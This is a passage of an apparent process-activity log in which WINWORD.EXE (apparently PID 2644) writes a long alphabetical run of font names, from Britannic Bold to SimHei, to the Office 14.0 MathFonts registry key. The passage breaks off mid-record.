WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Britannic Bold

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Broadway

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Browallia New

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

BrowalliaUPC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Brush Script MT

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Calibri

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Californian FB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Calisto MT

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Cambria

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Cambria Math

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Candara

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Castellar

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Centaur

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Century

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Century Gothic

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Century Schoolbook

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Chiller

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Colonna MT

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Comic Sans MS

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Consolas

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Constantia

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Cooper Black

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Copperplate Gothic Bold

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Copperplate Gothic Light

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Corbel

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Cordia New

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

CordiaUPC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Courier

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Courier New

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Curlz MT

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

DaunPenh

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

David

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

DFKai-SB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

DilleniaUPC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

DokChampa

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Dotum

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

DotumChe

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Ebrima

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Edwardian Script ITC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Elephant

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Engravers MT

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Eras Bold ITC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Eras Demi ITC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Eras Light ITC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Eras Medium ITC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Estrangelo Edessa

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

EucrosiaUPC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Euphemia

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Expo M

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

FangSong

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Felix Titling

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Fixedsys

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Footlight MT Light

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Forte

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Franklin Gothic Book

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Franklin Gothic Demi

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Franklin Gothic Demi Cond

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Franklin Gothic Heavy

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Franklin Gothic Medium

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Franklin Gothic Medium Cond

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

FrankRuehl

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

FreesiaUPC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Freestyle Script

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

French Script MT

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gabriola

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Garamond

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gautami

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Georgia

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gigi

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gill Sans MT

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gill Sans MT Condensed

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gill Sans MT Ext Condensed Bold

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gill Sans Ultra Bold

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gill Sans Ultra Bold Condensed

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gisha

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gloucester MT Extra Condensed

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Goudy Old Style

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Goudy Stout

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gulim

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

GulimChe

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gungsuh

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

GungsuhChe

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Haettenschweiler

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Harlow Solid Italic

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Harrington

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Headline R

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGGothicE

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGGothicM

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGGyoshotai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGKyokashotai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGMaruGothicMPRO

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGMinchoB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGMinchoE

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPGothicE

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPGothicM

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPGyoshotai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPKyokashotai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPMinchoB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPMinchoE

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPSoeiKakugothicUB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPSoeiKakupoptai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGPSoeiPresenceEB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSeikaishotaiPRO

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSGothicE

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSGothicM

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSGyoshotai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSKyokashotai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSMinchoB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSMinchoE

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSoeiKakugothicUB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSoeiKakupoptai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSoeiPresenceEB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSSoeiKakugothicUB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSSoeiKakupoptai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HGSSoeiPresenceEB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

High Tower Text

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYGothic-Extra

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYGothic-Medium

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYGraphic-Medium

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYGungSo-Bold

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYHeadLine-Medium

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYMyeongJo-Extra

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYPMokGak-Bold

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYPost-Light

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYPost-Medium

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYShortSamul-Medium

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

HYSinMyeongJo-Medium

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Impact

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Imprint MT Shadow

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Informal Roman

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

IrisUPC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Iskoola Pota

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

JasmineUPC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Jokerman

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Juice ITC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

KaiTi

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Kalinga

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Kartika

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Khmer UI

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

KodchiangUPC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Kokila

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Kristen ITC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Kunstler Script

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lao UI

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Latha

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Leelawadee

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Levenim MT

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

LilyUPC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lucida Bright

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lucida Calligraphy

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lucida Console

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lucida Fax

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lucida Handwriting

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lucida Sans

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lucida Sans Typewriter

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Lucida Sans Unicode

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Magic R

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Magneto

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Maiandra GD

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Malgun Gothic

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Mangal

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Marlett

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Matura MT Script Capitals

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Meiryo

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Meiryo UI

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft Himalaya

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft JhengHei

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft New Tai Lue

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft PhagsPa

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft Sans Serif

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft Tai Le

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft Uighur

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft YaHei

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Microsoft Yi Baiti

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MingLiU

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MingLiU_HKSCS

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MingLiU_HKSCS-ExtB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MingLiU-ExtB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Miriam

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Miriam Fixed

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Mistral

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Modern No. 20

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MoeumT R

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Mongolian Baiti

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Monotype Corsiva

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MoolBoran

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS Gothic

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS Mincho

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS Outlook

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS PGothic

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS PMincho

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS Reference Sans Serif

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS Reference Specialty

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS Sans Serif

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS Serif

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MS UI Gothic

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MT Extra

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

MV Boli

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Narkisim

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

New Gulim

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Niagara Engraved

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Niagara Solid

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

NSimSun

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Nyala

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

OCR A Extended

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

OCRB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Old English Text MT

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Onyx

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Palace Script MT

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Palatino Linotype

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Papyrus

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Parchment

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Perpetua

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Perpetua Titling MT

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Plantagenet Cherokee

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Playbill

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

PMingLiU

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

PMingLiU-ExtB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Poor Richard

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Pristina

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Pyunji R

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Raavi

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Rage Italic

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Ravie

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Rockwell

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Rockwell Condensed

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Rockwell Extra Bold

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Rod

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Sakkal Majalla

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Script MT Bold

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Segoe Print

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Segoe Script

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Segoe UI

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Segoe UI Light

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Segoe UI Semibold

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Segoe UI Symbol

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Shonar Bangla

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Showcard Gothic

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Shruti

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

SimHei

2644

WINWORD.EXE

write

